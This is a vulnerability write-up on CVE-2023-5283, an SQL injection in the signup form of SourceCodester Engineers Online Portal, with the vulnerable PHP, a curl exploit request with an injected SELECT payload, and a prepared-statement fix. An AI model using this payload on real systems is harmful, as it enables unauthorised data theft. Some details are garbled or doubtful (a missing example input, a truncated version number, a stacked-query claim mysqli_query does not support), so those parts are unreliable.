CVE CyberSecurity Database News

CVE-2023-5283 - Critical SQL Injection Vulnerability in SourceCodester Engineers Online Portal 1. (VDB-240911) — Exploit and Analysis

Poster -

A new critical vulnerability, CVE-2023-5283, has been discovered in the popular SourceCodester Engineers Online Portal version 1.. This vulnerability allows remote attackers to perform SQL Injection through improperly handled input fields in the teacher_signup.php file, specifically the firstname and lastname parameters. This post will break down what the vulnerability is, how it works, how to exploit it, and best practices to mitigate it.

What is SourceCodester Engineers Online Portal 1.?

SourceCodester Engineers Online Portal is a web-based system widely used in educational institutions and corporate training organizations. It helps manage teacher-student interactions, assignments, and more.

Vulnerability Details

- CVE Identifier: CVE-2023-5283
- Database Reference: VDB-240911

Affected Parameters: firstname, lastname

- Impact: Remote attackers can execute arbitrary SQL commands, potentially leaking sensitive data, modifying or deleting database entries, or gaining administrative access.

Where is the vulnerability?

The vulnerable code occurs in the teacher_signup.php file. Specifically, user-provided firstname and lastname values are directly included in SQL queries without sufficient sanitization.

Here’s a simplified look at the problematic section

// teacher_signup.php (simplified)
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$email = $_POST['email'];

// Vulnerable SQL - User input is directly injected into the query!
$sql = "INSERT INTO teachers (firstname, lastname, email) VALUES ('$firstname', '$lastname', '$email')";
$result = mysqli_query($conn, $sql);

Problem:
The $firstname and $lastname variables from the POST request are not sanitized or parameterized. This allows attackers to inject malicious SQL code.

Exploit Details

This vulnerability can be exploited by sending a specially crafted HTTP request to teacher_signup.php.

Example Exploit

Let’s say an attacker wants to extract all user data from the users table. They can input the following in the signup form:

The resulting SQL query becomes

INSERT INTO teachers (firstname, lastname, email) VALUES ('Robert'); SELECT * FROM users; -- ', 'Smith', 'attacker@example.com')

The injected SELECT * FROM users; is executed, possibly returning the full users table contents.

### Exploit via cURL / Burp Suite

Attackers can use tools like cURL

curl -X POST http://target-site.com/teacher_signup.php \
     -d "firstname=Robert');SELECT+*+FROM+users;--" \
     -d "lastname=Smith" \
     -d "email=attacker@example.com"

References

- NVD Entry - CVE-2023-5283
- VulDB ID VDB-240911
- SourceCodester Engineers Online Portal

Safe PHP Example with Prepared Statement

$stmt = $conn->prepare("INSERT INTO teachers (firstname, lastname, email) VALUES (?, ?, ?)");
$stmt->bind_param("sss", $firstname, $lastname, $email);
$stmt->execute();

Conclusion

CVE-2023-5283 is a critical vulnerability because it exposes sensitive data and control of the application to remote attackers, all with little effort. If you use or maintain SourceCodester Engineers Online Portal 1., take action immediately—apply input sanitization and prepared statements to all SQL queries.

Stay safe!
For more technical deep-backs, visit the NVD Database or VulDB.


*This post is for educational purposes only; always have permission for security testing.*

Timeline

Published on: 09/29/2023 20:15:10 UTC
Last modified on: 11/07/2023 04:23:47 UTC